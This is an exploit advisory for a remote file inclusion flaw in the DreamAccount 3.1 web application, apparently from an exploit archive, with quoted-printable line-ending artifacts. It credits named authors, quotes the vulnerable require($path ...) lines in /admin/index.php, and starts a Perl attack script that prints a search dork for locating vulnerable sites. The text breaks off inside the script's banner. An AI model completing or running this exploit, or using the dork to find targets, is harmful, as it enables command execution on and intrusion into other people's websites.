|
----------------------------------------------------=0D
DREAMACCOUNT V3.1 Command Execution Exploit =0D
----------------------------------------------------=0D
Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)=0D
Coded By Drago84(Exclusive Security Team) =0D
----------------------------------------------------=0D
site of script:http://dreamcost.com =0D
----------------------------------------------------=0D
Vulnerable: DREAMACCOUNT V3.1 =0D
----------------------------------------------------=0D
vulnerable file : =0D
------------------ =0D
/admin/index.php =0D
----------------------------------------------------=0D
vulnerable code: =0D
----------------------------------------------------=0D
require($path . "setup.php"); =0D
require($path . "functions.php"); =0D
require($path . "payment_processing.inc.php"); =0D
$path parameter File inclusion =0D
----------------------------------------------------=0D
#!/usr/bin/perl=0D
use HTTP::Request;=0D
use LWP::UserAgent;=0D
print "\n=============================================================================\r\n";=0D
print " * Dreamaccount Remote Command Execution 23/06/06 *\r\n"; =0D
print "=============================================================================\r\n";=0D
print "[*] dork:\"powered by DreamAccount 3.1\"\n";=0D
print "[*] Coded By : Drago84 \n";=0D
print "[*] Discovered by CrAsH_oVeR_rIdE\n";=0D
print "[*] Use